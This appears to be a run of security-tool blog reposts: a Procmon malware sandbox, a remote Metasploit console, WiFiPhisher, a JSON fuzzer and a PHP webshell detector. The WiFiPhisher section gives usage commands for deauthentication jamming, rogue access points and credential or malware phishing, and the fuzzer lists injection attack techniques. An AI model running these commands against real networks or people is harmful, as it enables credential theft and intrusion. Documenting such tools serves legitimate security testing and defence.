Noriben – Portable, Simple, Malware Analysis Sandbox

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample’s activities. Noriben allows you to not only run malware similar to a sandbox, but to also log system-wide events while you manually run malware in ways particular to making it run. For example, it can listen as you run malware that requires varying command line options. Or, watch the system as you step through malware in a debugger. Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though it would greatly help) as it contains numerous white list items to reduce unwanted noise from system activity. Cool Features If you have a folder of YARA signature files, you can specify it with the –yara option. Every new file create will be scanned against these signatures with the results displayed in the output results. If you have a VirusTotal API, place it into a file named “virustotal.api" (or embed directly in the script) to auto-submit MD5 file hashes to VT to get the number of viral results. You can add lists of MD5s to auto-ignore (such as all of your system files). Use md5deep and throw them into a text file, use –hash to read them. You can automate the script for sandbox-usage. Using -t to automate execution time, and –cmd "path\exe" to specify a malware file, you can automatically run malware, copy the results off, and then revert to run a new sample. The –generalize feature will automatically substitute absolute paths with Windows environment paths for better IOC development. For example, C:\Users\malware_user\AppData\Roaming\malware.exe will be automatically resolved to %AppData%\malware.exe. Usage: –===[ Noriben v1.6 ]===—-===[ @bbaskin ]===–usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [–hash HASH] [-t TIMEOUT] [–output OUTPUT] [–yara YARA] [–generalize] [–cmd CMD] [-d]optional arguments: -h, –help show this help message and exit -c CSV, –csv CSV Re-analyze an existing Noriben CSV file -p PML, –pml PML Re-analyze an existing Noriben PML file -f FILTER, –filter FILTER Specify alternate Procmon Filter PMC –hash HASH Specify MD5 file whitelist -t TIMEOUT, –timeout TIMEOUT Number of seconds to collect activity –output OUTPUT Folder to store output files –yara YARA Folder containing YARA rules –generalize Generalize file paths to their environment variables. Default: True –cmd CMD Command line to execute (in quotes) -d Enable debug tracebacks Download Noriben

Link: http://feedproxy.google.com/~r/PentestTools/~3/mrYkk21lOHk/noriben-portable-simple-malware.html

MSF-Remote-Console – A Remote Msfconsole To Connect To The Msfrcpd Server Of Metasploit

A remote msfconsole written in Python 2.7 to connect to the msfrcpd server of metasploit. This tool gives you the ability to load modules permanently as daemon on your server like autopwn2. Although it gives you the ability to remotely use the msfrpcd server it is recommended to use it locally with a ssh or mosh shell because certificate validation is not enabled. Features Optimized delivery & execution of commands. Has all msf commands implemented even future ones. This is possible through the structure of the rpc api. Browse through your command history with the up and down arrow key. Tab completion for system paths. It feels like the normal msfconsole! How does it look like ? [*] Connecting to server: Host => myDomain.com, Port => 55553, User => msf, Pwd => ***, SSL => True[+] Successfully connected[*] Console id: 19 , , / \ ((__—,,,—__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v4.12.22-dev-52b81f3 ]+ — –=[ 1577 exploits – 906 auxiliary – 272 post ]+ — –=[ 455 payloads – 39 encoders – 8 nops ]+ — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf > How do I use it ? Usage: Main.py [options] Options: -h, –help show this help message and exit -r RESOURCE, –resource=RESOURCE Path to resource file -u USERNAME, –user=USERNAME Username specified on msfrpcd -p PASSWORD, –pass=PASSWORD Password specified on msfrpcd -s, –ssl Enable ssl -P PORT, –port=PORT Port to connect to -H HOST, –host=HOST Server ip -c, –credentials Use hardcoded credentials -e, –exit Exit after executing resource scriptWith the -c option you can use the credentials hardcoded into Main.py feel free to change them so that you don’t have to use the credential parameters all the time. With the -r option you specify a resource script to load from your computer into the console. Example: This will load a resource script and use the hardcoded credentials: python Main.py -c -r /root/resource/handler/allHandlers.rcThis will log in to the msfrpcd server through command line arguments: python Main.py –ssl –port 55553 –host 127.0.0.1 –user msf –pass msf How do I install it ? First you must have metasploit installed. If you cant use the installer because you have no graphical environment or whatever use this guide from rapid7: Setting Up a Metasploit Development Environment This will install all needed dependencies: git clone https://github.com/allfro/pymetasploit.git pymetasploitcd pymetasploit && sudo python setup.py installAlso don’t forget to start your msfrpcd server: cd metasploit-framework/ruby msfrpcd -U msf -P msf -p 55553And its probably a good idea to start and connect to the postgresql database: By the way change the password in the echo line. sudo update-rc.d postgresql enablesudo service postgresql startecho “create database msf;create user msf with password ‘password’;grant all privileges on database msf to msf;" > createdb_sql.txtsudo -u postgres /usr/bin/psql < /home/postgres/createdb_sql.txtIn Metasploit: db_connect msf:password@127.0.0.1/msf Download MSF-Remote-Console

Link: http://feedproxy.google.com/~r/PentestTools/~3/oWnlKUxXlVM/msf-remote-console-remote-msfconsole-to.html

WiFiPhisher v1.2 – Automated victim-customized phishing attacks against Wi-Fi clients

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malwares. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys. Wifiphisher works on Kali Linux and is licensed under the GPL license. How it works After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page. From the victim’s perspective, the attack makes use in three phases: Victim is being deauthenticated from her access point . Wifiphisher continuously jams all of the target access point’s wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations. Victim joins a rogue access point . Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed. Victim is being served a realistic specially-customized phishing page . Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malwares. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim’s vendor. The tool supports community-built templates for different phishing scenarios. Performing MiTM attack Requirements Following are the requirements for getting the most out of Wifiphisher: Kali Linux. Although people have made Wifiphisher work on other distros, Kali Linux is the officially supported distribution, thus all new features are primarily tested on this platform. One wireless network adapter that supports AP mode. Drivers should support netlink. One wireless network adapter that supports Monitor mode and is capable of injection. Again, drivers should support netlink. If a second wireless network adapter is not available, you may run the tool with the –nojamming option. This will turn off the de-authentication attack though. Installation To install the latest development version type the following commands: git clone https://github.com/sophron/wifiphisher.git # Download the latest revisioncd wifiphisher # Switch to tool’s directorysudo python setup.py install # Install any dependencies (Currently, hostapd, PyRIC, jinja2) Alternatively, you can download the latest stable version from the Releases page . Usage Run the tool by typing wifiphisher or python bin/wifiphisher (from inside the tool’s directory). By running the tool without any options, it will find the right interfaces and interactively ask the user to pick the ESSID of the target network (out of a list with all the ESSIDs in the around area) as well as a phishing scenario to perform. wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgradeUse wlan0 for spawning the rogue Access Point and wlan4 for DoS attacks. Select the target network manually from the list and perform the “Firmware Upgrade" scenario. Useful for manually selecting the wireless adapters. The "Firware Upgrade" scenario is an easy way for obtaining the PSK from a password-protected network. wifiphisher –essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rdAutomatically pick the right interfaces. Target the Wi-Fi with ESSID "CONFERENCE_WIFI" and perform the "Plugin Update" scenario. The Evil Twin will be password-protected with PSK "s3cr3tp4ssw0rd". Useful against networks with disclosed PSKs (e.g. in conferences). The "Plugin Update" scenario provides an easy way for getting the victims to download malicious executables (e.g. malwares containing a reverse shell payload). wifiphisher –nojamming –essid "FREE WI-FI" -p oauth-loginDo not target any network. Simply spawn an open Wi-Fi network with ESSID "FREE WI-FI" and perform the "OAuth Login" scenario. Useful against victims in public areas. The "OAuth Login" scenario provides a simple way for capturing credentials from social networks, like Facebook. Following are all the options along with their descriptions (also available with wifiphisher -h ): Short form Long form Explanation -h –help show this help message and exit -s SKIP –skip SKIP Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA -jI JAMMINGINTERFACE –jamminginterface JAMMINGINTERFACE Manually choose an interface that supports monitor mode for deauthenticating the victims. Example: -jI wlan1 -aI APINTERFACE –apinterface APINTERFACE Manually choose an interface that supports AP mode for spawning an AP. Example: -aI wlan0 -t TIMEINTERVAL –timeinterval TIMEINTERVAL Choose the time interval between DEAUTH packets being sent -dP DEAUTHPACKETS –deauthpackets DEAUTHPACKETS Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -dP 2 -d –directedonly Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs -nJ –nojamming Skip the deauthentication phase. When this option is used, only one wireless interface is required -e ESSID –essid ESSID Enter the ESSID of the rogue Access Point. This option will skip Access Point selection phase. Example: –essid ‘Free WiFi’ -p PHISHINGSCENARIO –phishingscenario PHISHINGSCENARIO Choose the phishing scenario to run.This option will skip the scenario selection phase. Example: -p firmware_upgrade -pK PRESHAREDKEY –presharedkey PRESHAREDKEY Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd Screenshots Targeting an access point A successful attack Fake router configuration page Fake OAuth Login Page Fake web-based network manager Disclaimer Authors do not own the logos under the wifiphisher/data/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Usage of Wifiphisher for attacking infrastructures without prior mutual consistency can be considered as an illegal activity. It is the final user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.  Download WiFiPhisher

Link: http://feedproxy.google.com/~r/PentestTools/~3/8kXzbT6EXPI/wifiphisher-v12-automated-victim.html

PyJFuzz – Python JSON Fuzzer

PyJFuzz is a small, extensible and ready-to-use framework used to fuzz JSON inputs , such as mobile endpoint REST API, JSON implementation, Browsers, cli executable and much more. Version 1.1.0 Homepage http://www.mseclab.com/ Github https://github.com/mseclab/PyJFuzz Author Daniele Linguaglossa ( @dzonerzy ) License MIT – (see LICENSE file) Installation Dependencies In order to work PyJFuzz need a single dependency, bottle , you can install it from automatic setup.py installation. Installation You can install PyJFuzz with the following command git clone https://github.com/mseclab/PyJFuzz.git && cd PyJFuzz && sudo python setup.py install Documentation and Examples CLI tool Once installed PyJFuzz will create both a python library and a command-line utility called pjf (screenshot below) Library PyJFuzz could also work as a library, you can import in your project like following from pyjfuzz.lib import * Classes The available object/class are the following: PJFServer – User to start and stop built-in HTTP and HTTPS servers PJFProcessMonitor – Used to monitor process crash, it will automatically restart proccess each time it crash PJFTestcaseServer – The testcase server is used in conjunction with PJFProcessMonitor, whenever a process crash the testcase server will register and store the JSON which cause the crash PJFFactory – It’s the main object used to do the real fuzz of JSON objects PJFConfiguration – It’s the configuration file for each of the available objects PJFExternalFuzzer – Used by PJFactory is a auxiliary class which provide an interface to other command line fuzzer such as radamsa PJFMutation – Used by PJFFactory provide all the mutation used during fuzzing session PJFExecutor – Provides an interface to interact with external process Examples Below some trivial example of how-to implement PyJFuzz powered program simple_fuzzer.py from argparse import Namespacefrom pyjfuzz.lib import *config = PJFConfiguration(Namespace(json={“test": ["1", 2, True]}, nologo=True, level=6))fuzzer = PJFFactory(config)while True: print fuzzer.fuzzed simple_server.py from argparse import Namespacefrom pyjfuzz.lib import *config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, debug=True, indent=True))PJFServer(config).run()Sometimes you may need to modify standard non customizable settings such as HTTPS or HTTP server port, this can be done in the following way from argparse import Namespacefrom pyjfuzz.lib import *config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, indent=True))print config.ports["servers"]["HTTP_PORT"] # 8080print config.ports["servers"]["HTTPS_PORT"] # 8443print config.ports["servers"]["TCASE_PORT"] # 8888config.ports["servers"]["HTTPS_PORT"] = 443 # Change HTTPS port to 443 Remember : When changing default ports, you should always handle exception due to needed privileges! Below a comprehensive list of all available settings / customization of PJFConfiguration object: Configuration table Name Type Description json dict JSON object to fuzz json_file str Path to a JSON file parameters list List of parameters to fuzz (taken from JSON object) techniques list <int> List of polyglot attack, used to generate fuzzed JSON, such as XSS, LFI etc. They are in the range 0-13 (Look techniques table ) level int Fuzzing level in the range 0-6 utf8 bool If true switch from unicode encode to pure byte representation indent bool Set whenever to indent the result object url_encode bool Set whenever to URLEncode the result object strong_fuzz bool Set whenever to use strong fuzzing (strong fuzzing will not maintain JSON structure, usefull for parser fuzzing) debug bool Set whenever to enable debug prints exclude bool Exclude from fuzzing parameters selected by parameters option notify bool Set whenever to notify process monitor when a crash occurs only used with PJFServer html str Path to an HTML directory to serve within PJFServer ext_fuzz bool Set whenever to use binary from "command" as an externale fuzzer cmd_fuzz bool Set whenever to use binary from "command" as fuzzer target content_type str Set the content type result of PJFServer (default application/json ) command list <str> Command to execute each paramester is a list element, you could use shlex.split from python Techniques table Index Description 0 XSS injection (Polyglot) 1 SQL injection (Polyglot) 2 LFI attack 3 SQL injection polyglot (2) 4 XSS injection (Polyglot) (2) 5 RCE injection (Polyglot) 6 LFI attack (2) 7 Data URI attack 8 LFI and HREF attack 9 Header injection 10 RCE injection (Polyglot) (2) 11 Generic templace injection 12 Flask template injection 13 Random character attack Screenshots Below some screenshot just to let you know what you should expect from PyJFuzz Built-in tool PyJFuzz is shipped with a built-in tool called PyJFuzz Web Fuzzer , this tool will provide an automatic fuzzing console via HTTP and HTTPS server, it can be used to easly fuzz almost any web browser even when you can’t control the process state! There are two switch used to launch this tool (–browser-auto and –fuzz-web), the first one perform automatic browser restart when a crash occur, the other one try to catch when a browser doesn’t make requests anymore. Both of them always save the testcases, below some screenshots. End Thanks for using PyJFuzz! Happy Fuzzing from mseclab Download PyJFuzz

Link: http://feedproxy.google.com/~r/PentestTools/~3/Sav7YMqS32A/pyjfuzz-python-json-fuzzer.html

BackdoorMan – Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells

A Python open source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination, it automates the process of detecting the above. Purpose The main purpose of BackdoorMan is to help web-masters and developers to discover malicious scripts in their site files, because it is quite common for hackers to place a back-door on a site they have hacked. A back-door can give the hacker continued access to the site even if the site owners change account passwords. Back-door scripts will vary from 100s of lines of code to 1 or 2 lines of code and can be merged in hundreds of files which makes it very hard to discover it, especially if the back-door is inactive. There is common ways and tools that can be used including grep , but BackdoorMan automates all the above as described earlier and make it even more easier (at least I hope so). Features Shells detect by filename using shells signature database. Recognition of web back-doors. Detect the use of suspicious PHP functions and activities. Use of external services beside its functionalities. Use of nimbusec shellray API (free online webshell detect for PHP files https://shellray.com ). Very high recognition performance for webshells. Check suspicious PHP files online. Easy, fast and reliable. Classification for webshells with behavior classification. Free service of nimbusec. Use of VirusTotal Public API (free online service that analyzes files and facilitates the quick detection of viruses, worms, trojans and all kinds of malware), it can be useful in our situation. Use of UnPHP (The online PHP decoder: UnPHP is a free service for analyzing obfuscated and malicious PHP code) www.unphp.net . Very useful in our situation. Eval + gzinflate + Base64. Recursive De-Obfuscating. Custom Function and Regex Support. Requirements requests module Version v2.3.1 Author Yassine Addi Usage Usage: BackdoorMan [options] destination1 [destination2 …]A toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination.Author: Yassine Addi .NOTE: This tool does not require Internet connection but it is highly recommended to benefit from all features.Options: –version show program’s version number and exit -h, –help show this help message and exit -o OUTPUT, –output=OUTPUT save output in a file –no-color do not use colors in the output –no-info do not show file information –no-apis do not use APIs during scan (not recommended) Changelog v1.0.0 – 1st release <https://github.com/yassineaddi/PHP-backdoor-detector>.v2.0.0 – rename software to `BackdoorMan`. – improve external services (APIs). – separate databases from main script. – lot of improvements (compare with 1st release).v2.1.0 – separate script to classes to optimize the software.v2.2.0 – add `Servicer` class. – rename classes. – add `–no-color` option. – add `–no-external-services` option. – add `–no-file-info` option. – improve `Reporter` class. – improve software interface. – small improvements. – remove single-line and multi-line comments before scanning. – add `–force` option. – add UnPHP API. – improve `activities.txt` database.v2.2.1 – modify comments.v2.3.1 – use of custom parser instead of reg-ex to detect backticks (execution operator) due to false positives. – improved report class. – separate functions and activities to low, medium and high… – rename options. – add `-o, –output` option. – add/modify comments. Download BackdoorMan

Link: http://feedproxy.google.com/~r/PentestTools/~3/_ANWpsC6c4A/backdoorman-toolkit-that-helps-you-find.html